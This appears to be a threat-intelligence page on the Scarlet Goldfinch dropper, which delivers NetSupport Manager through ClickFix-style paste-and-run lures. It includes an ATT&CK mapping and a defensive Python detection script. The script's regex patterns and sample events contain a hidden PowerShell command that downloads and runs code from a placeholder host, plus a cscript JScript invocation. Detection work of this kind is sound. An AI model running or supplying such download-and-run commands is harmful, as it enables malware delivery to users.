
Scarlet Goldfinch

Scarlet Goldfinch is a Red Canary-tracked threat/activity cluster described as a dropper that uses a distribution scheme similar to SocGholish. It uses JScript files to drop NetSupport Manager onto victim systems. Red Canary reported Scarlet Goldfinch as one of its prominent "color bird" threats in 2025, ranking second in April 2025, and also identified it as a dropper threat cluster in first-half 2025 reporting. The cluster has been observed delivered through paste-and-run social engineering activity, also referred to as ClickFix or fakeCAPTCHA, in which users are tricked into pasting and executing malicious commands. Supporting reporting also notes broader delivery methods used across Red Canary-tracked prevalent threats in 2025, including fake browser updates, malvertising, SEO poisoning, compromised browser extensions, and potentially unwanted programs, but the high-confidence behavior directly attributed to Scarlet Goldfinch is the use of JScript to deploy NetSupport Manager. NetSupport Manager is a legitimate remote access tool that adversaries abuse for unauthorized remote control. No specific industries, geographies, or standalone IOCs were provided for Scarlet Goldfinch in the supplied content.


MITRE ATT&CK

Techniques & procedures

5 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

3 techniques
T1059.001 PowerShell (Evidence: 1)

In most scenarios, once users interact with the Fix or Verify button in the lure, the button will covertly copy an obfuscated PowerShell command to the clipboard and present the user with “verification steps.”

T1059.007 JavaScript (Evidence: 1)

Using cscript.exe to execute a command containing //e:Jscript in this way gives us a detection opportunity. Detection opportunity: instances of wscript.exe or cscript.exe running or interpreting malicious JScript payloads.

T1204 User Execution (Evidence: 1)

The adversary is trying to entice the user into verifying or fixing something by typing a command into a terminal, run dialog box, or PowerShell.

Collection

1 technique
T1115 Clipboard Data (Evidence: 1)

The button will covertly copy an obfuscated PowerShell command to the clipboard and present the user with “verification steps.”

Command and Control

1 technique
T1105 Ingress Tool Transfer (Evidence: 1)

By following the “verification steps,” the user inadvertently runs the command and additional commands will reach out and download malware or tools.
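The two detection opportunities in the evidence above (Windows Script Host interpreting JScript via //e:Jscript, and a pasted PowerShell command that downloads and runs additional tooling) can be expressed as simple rules over process-creation telemetry. The following is an added example, not code from the original page, from Mallory or from Red Canary. The event field names mirror Sysmon-style ParentImage/Image/CommandLine but are assumed, the sample events are constructed, and treating explorer.exe as the parent of a Run-dialog PowerShell launch is a heuristic assumption rather than something the page states.

```python
"""Rule-based detection for the two Scarlet Goldfinch behaviours above.

Assumptions (not from the original page): field names, the explorer.exe
parent heuristic for paste-and-run launches, and all sample events below,
which are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcessEvent:
    event_id: int
    parent_image: str   # assumed field name (cf. Sysmon ParentImage)
    image: str          # assumed field name (cf. Sysmon Image)
    command_line: str   # assumed field name (cf. Sysmon CommandLine)


# Rule 1 (T1059.007): wscript.exe / cscript.exe asked to interpret JScript,
# either explicitly via //e:Jscript or by running a .js file.
SCRIPT_HOST = re.compile(r'(?:^|\\)(?:wscript|cscript)\.exe$', re.IGNORECASE)
JSCRIPT_MARKER = re.compile(r'//e:\s*jscript|\.js["\']?\s*$', re.IGNORECASE)

# Rule 2 (T1059.001 / T1105): PowerShell spawned directly by the shell
# (explorer.exe, heuristic for a Run-dialog paste) carrying download-cradle,
# encoded-command or hidden-window markers.
POWERSHELL = re.compile(r'(?:^|\\)(?:powershell|pwsh)\.exe$', re.IGNORECASE)
SHELL_PARENT = re.compile(r'(?:^|\\)explorer\.exe$', re.IGNORECASE)
SUSPICIOUS_PS = re.compile(
    r'(?:invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b'
    r'|-e(?:nc|ncodedcommand)?\b|-w(?:indowstyle)?\s+hidden)',
    re.IGNORECASE,
)


def classify(ev: ProcessEvent) -> List[str]:
    """Return the list of rule tags that fire for one process-creation event."""
    tags: List[str] = []
    if SCRIPT_HOST.search(ev.image) and JSCRIPT_MARKER.search(ev.command_line):
        tags.append('jscript_via_script_host')
    if (POWERSHELL.search(ev.image)
            and SHELL_PARENT.search(ev.parent_image)
            and SUSPICIOUS_PS.search(ev.command_line)):
        tags.append('paste_and_run_powershell')
    return tags


def scan(events) -> Dict[int, List[str]]:
    """Map event_id -> fired tags, keeping only events that matched a rule."""
    return {ev.event_id: tags for ev in events if (tags := classify(ev))}


# Constructed sample telemetry: two events that should alert, two that should not.
SAMPLE_EVENTS = [
    ProcessEvent(1, r'C:\Windows\explorer.exe',
                 r'C:\Windows\System32\cscript.exe',
                 r'cscript.exe //nologo //e:Jscript C:\Users\victim\AppData\Local\Temp\update.txt'),
    ProcessEvent(2, r'C:\Windows\explorer.exe',
                 r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
                 'powershell.exe -w hidden -c "iex (iwr http://placeholder.invalid/v)"'),
    # Benign: a VBScript run by a system service, not JScript.
    ProcessEvent(3, r'C:\Windows\System32\svchost.exe',
                 r'C:\Windows\System32\wscript.exe',
                 r'wscript.exe C:\Windows\System32\gatherNetworkInfo.vbs'),
    # Benign: interactive PowerShell from cmd.exe with no suspicious markers.
    ProcessEvent(4, r'C:\Windows\System32\cmd.exe',
                 r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
                 'powershell.exe -NoProfile Get-Process'),
]


if __name__ == '__main__':
    for event_id, tags in scan(SAMPLE_EVENTS).items():
        print(f'event {event_id}: {", ".join(tags)}')
```

Rule 2 is intentionally conservative: requiring all three of a PowerShell image, an explorer.exe parent and a cradle or hidden-window marker keeps ordinary administrative PowerShell out of the alert queue, at the cost of missing launches from a terminal rather than the Run dialog. Tuning the parent-process list to the hosts that the lure actually targets in your environment is the usual next step.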

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping (5)

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.